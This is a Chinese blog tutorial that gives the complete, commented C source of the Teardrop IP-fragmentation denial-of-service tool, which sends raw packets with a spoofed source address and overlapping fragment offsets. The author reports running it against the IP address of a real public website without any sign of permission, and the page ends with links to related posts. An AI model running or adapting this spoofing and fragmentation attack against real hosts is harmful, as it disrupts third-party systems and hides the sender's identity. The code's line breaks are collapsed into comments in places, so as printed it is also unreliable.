目录

  • 准备阶段
  • 抓包验证
  • 参考资料

准备阶段


将虚拟机网络适配器的连接模式更改为桥接模式

进入虚拟机,创建一个名为Teardrop(泪滴攻击)的文件,并输入以下代码

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <netdb.h>
#include <netinet/in.h>
#include <netinet/udp.h>
#include <arpa/inet.h>
#include <sys/types.h>
#include <sys/time.h>
#include <sys/socket.h>
#include <errno.h>#ifdef STRANGE_BSD_BYTE_ORDERING_THING
/* OpenBSD < 2.1, all FreeBSD and netBSD, BSDi < 3.0 */
#define FIX(n)  (n)
#else
/* OpenBSD 2.1, all Linux */
#define FIX(n)  htons(n)
#endif  /* STRANGE_BSD_BYTE_ORDERING_THING */#define IP_MF 0x2000  /* More IP fragment en route */
#define IPH 0x14    /* IP header size */
#define UDPH 0x8     /* UDP header size */
#define PADDING  0x1c    /* datagram frame padding for first packet */
#define MAGIC  0x3     /* Magic Fragment Constant (tm).  Should be 2 or 3 */
#define COUNT 0x1
/* Linux dies with 1, NT is more stalwart and can* withstand maybe 5 or 10 sometimes...  Experiment.*///错误处理函数
void usage(u_char *);
//获取主机信息
u_long name_resolve(u_char *);
//设置 IP 包的内容并发送
void send_frags(int ,u_long,u_long,u_short,u_short);//主函数
int main(int argc,char **argv)
{int one = 1, count = 0, i, rip_sock;//定义无符号长整型源 IP 和目的 IPu_long src_ip = 0, dst_ip = 0;//定义无符号短整型源端口号和目的端口号u_short src_prt = 0, dst_prt = 0;/*定一个结构体 in_addr(表示一个32位的IPv4地址)的一个对象struct in_addr{union{struct{u_char s_b1,s_b2,s_b3,s_b4;} S_un_b; //An IPv4 address formatted as four u_chars.struct{u_short s_w1,s_w2;} S_un_w; //An IPv4 address formatted as two u_shortsu_long S_addr;//An IPv4 address formatted as a u_long} S_un;#define s_addr S_un.S_addr};*/struct in_addr addr;printf("teardrop route|daemon9\n\n");/*创建一个原始套接字AF_INET——IPv4地址;SOCK_RAW——原始的套接字类型IPPROTO_RAW——允许使用底层的套接字协议,就可以自己编写IP包如果创建套接字成功,则会返回一个描述符(int型),失败则会返回 INVALID_SOCKET每个电脑里面都会有一个描述符表,对应套接字如果创建失败,将错误消息输出到屏幕然后退出程序*/if((rip_sock = socket(AF_INET,SOCK_RAW,IPPROTO_RAW)) < 0){fprintf(stderr,"raw socket");exit(1);}/*设置原始套接字选项 IP_HDRINCL如果不设置这个选项,IP 协议会自动填充 IP 数据包的首部这个情况是我们所不需要的,我们需要自己编写 IP 包*/if(setsockopt(rip_sock,IPPROTO_IP,IP_HDRINCL,(char *)&one,sizeof(one)) < 0){fprintf(stderr,"IP_HDRINCL");exit(1);}/*如果程序运行时送给main函数的命令行参数个数小于 3 个,调用 usage 函数,传参为 argv[0]:指向程序运行的全路径名*/if(argc < 3)usage(argv[0]);//调用 name_resolve 函数设置源 IP 和目的 IP if(!(src_ip = name_resolve(argv[1])) || !(dst_ip = name_resolve(argv[2]))){fprintf(stderr,"What the hell kind of IP address is that?\n");exit(1);}/*调用 getopt 函数分析命令行参数,该函数的参数含义:——命令行参数个数(argc)——命令行参数内容(argv)——参数格式(opstring):字母后有 : 表示该选项后面必须跟参数getopt 函数处理不符合 optstring 指定的选项并将选项后的参数保存在 optarg 中然后返回选项的 ASCLL 码atoi 函数是将参数(optarg)转化为十进制(会跳过前面的空白字符)如果不能转化为十进制,则返回 0 ,值过大返回 -1该循环语句是为了从命令行传端口值*/while((i = getopt(argc, argv, "s:t:n:")) != EOF){switch (i){case 's'://源端口(重点)src_prt = (u_short)atoi(optarg);break;case 't'://目的端口 (DNS,任何人?)dst_prt = (u_short)atoi(optarg);break;case 'n'://设置发送包的个数count = atoi(optarg);break;default:usage(argv[0]);break;}}/*srandom 函数:设置种子值(以“当前时间 + 进程 ID”作为种子)如果前面设置的源端口和目的端口是零,则随机赋值*/srandom((unsigned)(utimes("0",(time_t)0)));if(!src_prt)src_prt = (random() % 0xffff);//设置随机源端口号if(!dst_prt)dst_prt = (random() % 0xffff);//设置随即目的端口号if(!count)count = COUNT;//设置默认为一个包//inet_ntoa 函数:将一个IP转换成一个互联网标准点分格式的字符串printf("Death on flaxen wings:\n");addr.s_addr = src_ip;//给对象 addr 的成员变量赋值printf("From:%15s.%5d\n",inet_ntoa(addr), src_prt);addr.s_addr = dst_ip;//给对象 addr 的成员变量 赋值printf("To:%15s.%5d\n",inet_ntoa(addr), dst_prt);printf("Amt:%5d\n",count);printf("[\n");/*循环调用 send_frags 函数每一次循环完了后睡眠 0.5 s*/for (i = 0; i < count; i++){send_frags(rip_sock,src_ip,dst_ip,src_prt,dst_prt);usleep(500);}printf("]\n");return (0);
}//设置 IP 包的内容并发送
void send_frags(int sock,u_long src_ip,u_long dst_ip,u_short src_prt,u_short dst_prt)
{u_char *packet = NULL, *p_ptr = NULL,*flag = NULL;//定义 IP 包指针u_char byte;//无符号字符储存二进制struct sockaddr_in sin;/*sockaddr 套接字协议结构用于存储参与(IP)Windows/linux套接字通信的计算机上的一个internet协议(IP)地址struct sockaddr {unsigned short sa_family; //address family, AF_xxxchar sa_data[14]; //14 bytes of protocol address};*/sin.sin_family = AF_INET;//IPv4地址sin.sin_port = src_prt;//源端口sin.sin_addr.s_addr = dst_ip;//目的 IP/*malloc 函数:原型:extern void *malloc(unsigned int num_bytes);功能:分配长度为num_bytes字节的内存块(这里分配了 56 个字节的内存块)说明:分配成功则返回指向被分配内存的指针,否则返回空指针 NULL*/packet = (u_char *)malloc(IPH + UDPH + PADDING);p_ptr = packet;//指向 IP 包内存地址flag = packet;/*bzero 函数:原型:extern void bzero(void *s, int n);功能:置字节字符串前n个字节为零且包括‘\0’,无返回值这里是将 IP 包的 56 个字节全部至空*/bzero((u_char *)p_ptr,IPH + UDPH + PADDING);/*设置 IP 包的Version(版本)和Hlen(长度)大多数的 IP 包都是以 4500 开头的(十六进制) */byte = 0x45;/*memcpy 函数:原型:void *memcpy(void *destin, void *source, unsigned n);功能:从源内存地址的起始位置开始拷贝若干个字节到目标内存地址中即从源source中拷贝n个字节到目标destin中这里是指从 byte 的内容(0x45)拷贝到 IP 包中*/memcpy(p_ptr, &byte, sizeof(u_char));p_ptr += 2;// 此时默认 IP 包的 TOS(优先级)为 0/*FIX 函数(htons 函数的别名)htons 函数:将一个无符号短整型的主机数值转换为网络字节顺序即大尾顺序(big-endian)这里是设置 Datagram Total Length(IP 包总长度)*/*((u_short *)p_ptr) = FIX(IPH + UDPH + PADDING);p_ptr += 2;//这是是设置 identifier(IP 包标识)*((u_short *)p_ptr) = htons(242);//IP idp_ptr += 2;//这里设置 Flags(标志)*((u_short *)p_ptr) |= FIX(IP_MF);p_ptr += 2;//设置 TTL (存活期)*((u_short *)p_ptr) = 0x40;//设置 Protocol(协议)byte = IPPROTO_UDP;memcpy(p_ptr + 1, &byte, sizeof(u_char));//IP 的校验码由实时操作系统设置p_ptr += 4;//设置 IP 包的 Source Address(源地址)*((u_long *)p_ptr) = src_ip;p_ptr += 4;//设置 IP 包的 Destination Address(目的地址)*((u_long *)p_ptr) = dst_ip;p_ptr += 4;//设置 UDP 的源端口*((u_short *)p_ptr) = htons(src_prt);p_ptr += 2;//设置 UDP 的目的端口*((u_short *)p_ptr) = htons(dst_prt);p_ptr += 2;//设置 UDP 的数据长度*((u_short *)p_ptr) = htons(PADDING);p_ptr += 4;/*设置要发送的数据:Fake News根据 ASCLL 码表可转换成 46 61 6B 65 20 4E 65 77 73*/*((u_short *)p_ptr) = 0x46;p_ptr++;*((u_short *)p_ptr) = 0x61;p_ptr++;*((u_short *)p_ptr) = 0x6B;p_ptr++;*((u_short *)p_ptr) = 0x65;p_ptr++;*((u_short *)p_ptr) = 0x20;p_ptr++;*((u_short *)p_ptr) = 0x4E;p_ptr++;*((u_short *)p_ptr) = 0x65;p_ptr++;*((u_short *)p_ptr) = 0x77;p_ptr++;*((u_short *)p_ptr) = 0x73;/*sendto 函数:指向一指定目的地发送数据将指定字节数的数据发送到指定的终结点sendto()适用于发送未建立连接的UDP数据报(参数为SOCK_DGRAM)返回值:为整型,如果成功,则返回发送的字节数,失败则返回SOCKET_ERROR发送 IPv4 包,下面这个条件语句发送失败才会执行*/int i=1;while(i <= 56){printf("%x\t",*flag);flag++;if(0 == i%8)printf("\n");i++;}if(sendto(sock, packet, IPH + UDPH + PADDING, 0, (struct sockaddr *)&sin, sizeof(struct sockaddr)) == -1){fprintf(stderr, "\nsendto");free(packet);//释放 packet 指针exit(1);}//IP total length is 2 bytes into the header//IP 包总长度是2字节,放进头部p_ptr = &packet[2];*((u_short *)p_ptr) = FIX(IPH + MAGIC + 1);//IP offset is 6 bytes into the headerp_ptr += 4;*((u_short *)p_ptr) = FIX(MAGIC);//发送 UDP 包,下面这个条件语句发送失败才会执行if(sendto(sock, packet, IPH + MAGIC + 1, 0, (struct sockaddr *)&sin, sizeof(struct sockaddr)) == -1){fprintf(stderr, "\nsendto");free(packet);exit(1);}free(packet);
}//获取主机信息
u_long name_resolve(u_char *host_name)
{struct in_addr addr;//32位 IPv4 地址/*hostent 结构体:该结构记录主机的信息,包括主机名、别名、地址类型、地址长度和地址列表struct hostent {char *h_name;char **h_aliases;int h_addrtype;int h_length;char **h_addr_list;};#define h_addr h_addr_list[0]*/struct hostent *host_ent;/*gethostbyname 函数:返回对应于给定主机名的包含主机名字和地址信息的hostent结构指针bcopy 函数:将第一个参数(字符串)的前n(第三个参数)个字节复制到第二个参数中*/if((addr.s_addr = inet_addr(host_name)) == -1){if(!(host_ent = gethostbyname(host_name)))return (0);bcopy(host_ent->h_addr, (char *)&addr.s_addr, host_ent->h_length);}return (addr.s_addr);
}//错误处理函数
void usage(u_char *name)
{fprintf(stderr, "%s src_ip dst_ip [ -s src_prit ] [ -t dst_prt ] [ -n how_many  ]\n",name);exit(0);
}


完成以后运行文件,并输入要伪造的ip地址以及目的ip地址,这里的源ip地址为我手机热点的ip,目的ip为csdn官网的ip地址

抓包验证


通过wireshark抓包,验证伪装成功

参考资料

https://blog.csdn.net/ssj925319/article/details/110161814

Socket实战——Teardrop代码编程相关推荐

  1. TearDrop代码编程与SOCKET应用实例

    TearDrop代码编程与SOCKET应用实例(wait for update) 实验环境ubuntu 18.04 server版 文章目录 TearDrop代码编程与SOCKET应用实例(wait ...

  2. Teardrop代码编程,伪造一个虚假地址的IP包和SOCKET应用实例

    Teardrop攻击 Teardrop攻击是一种畸形报文攻击.原理是向攻击者发送的多个分片的IP包,由于操作系统会将分开的IP包重新组合,系统收到偏移量错误IP包然后组合,导致数据异常. 实验代码:为 ...

  3. Teardrop代码编程

    一.Teardrop攻击 1.介绍 Teardrop攻击是一种畸形报文攻击.是基于UDP的病态分片数据包的攻击方法,其工作原理是向被攻击者发送多个分片的IP包(IP分片数据包中包括该分片数据包属于哪个 ...

  4. Teardrop代码编程,创建虚假包

    Teardrop代码编程 编写Teardrop程序 Teardrop代码编程,伪造一个虚假地址的IP包,包的内容填入Fake News.发送此包.并用wireshark抓包进行验证. 编写Teardr ...

  5. 原始套接字编程”中的Teardrop代码编程

    原始套接字编程"中的Teardrop代码编程 (1)实验代码: #include <stdio.h> #include <stdlib.h> #include < ...

  6. 实战Linux Bluetooth编程

    实战Linux Bluetooth编程(一) 协议栈概述 Sam一年前在Linux下写了一个类似Windows下BTW的库--BTX.现在需要添加新功能时发现很多知识点都忘记 了.所以决定在这次学习中 ...

  7. 《java性能优化实战》之编程性能优化

    目录 一.java编程性能优化实战 1.如何使用String.intern 节省内存 2.如何使用字符串的分割方法? 3.ArrayList还是LinkedList?使用不当性能差千倍 4.Strea ...

  8. php运行socket服务器,PHP_php简单socket服务器客户端代码实例,本篇文章分享一个简单的socket - phpStudy...

    php简单socket服务器客户端代码实例 本篇文章分享一个简单的socket示例,用php.实现一个接收输入字符串,处理并返回这个字符串到客户端的TCP服务. 产生一个 socket 服务端 /*文 ...

  9. Java Socket实战之四 传输压缩对象

    2019独角兽企业重金招聘Python工程师标准>>> 本文地址:http://blog.csdn.net/kongxx/article/details/7259834 Java S ...

最新文章

  1. 粒子群算法(1)----粒子群简要
  2. 基于人脸关键点修复人脸,腾讯等提出优于SOTA的LaFIn生成网络
  3. 一起谈.NET技术,.NET 打包入门
  4. 关于上拉电阻的使用总结
  5. 他是中国投资最厉害的人:投网易一战成名 是巴菲特忠实信徒
  6. websvn mysql_Centos 5.3 Nginx+php+mysql配置 独立的 Subversion (SVN)服务器
  7. 什么是Session共享?请举出使用场景
  8. JS module的导出和导入
  9. Windows多网口内外网设置
  10. transient关键字和volatile关键字
  11. java time 赋予时间_java.time.OffsetTime
  12. windows 使用自带的cmd终端进行文件MD5校验
  13. jsp实现购物车结算页面
  14. 《动手学深度学习》资料汇总+网站推荐
  15. win10录屏_99%的人都忽略Windows自带的录屏软件,超好用!
  16. Skip Locked——跳过加锁行
  17. 【Asan】新鲜货:使用ASan检测内存越界问题
  18. excel插件开发,Smartbi免费版安装流程
  19. matlab 祁彬彬,MATLAB 向量化编程基础精讲
  20. Java简简单单抢红包小程序(代码)

热门文章

  1. 在线Json格式化、在线格式化Json代码、Json代码美化器、Json在线压缩、Json \uxxxx格式解码
  2. git时光穿梭机总结
  3. Win10 系统 C 盘飘红,6 招瞬间腾出十几 GB 空间
  4. 二、极大联通子图、极小联通子图
  5. 删除excel中的分页符
  6. 如何定位web前后台的BUG
  7. 自学编程,10个程序员学习必收藏的编程网站,你知道几个?
  8. pdf转换成excel转换器
  9. UE4关于材质的几个小技巧
  10. HTML的简单页面加密代码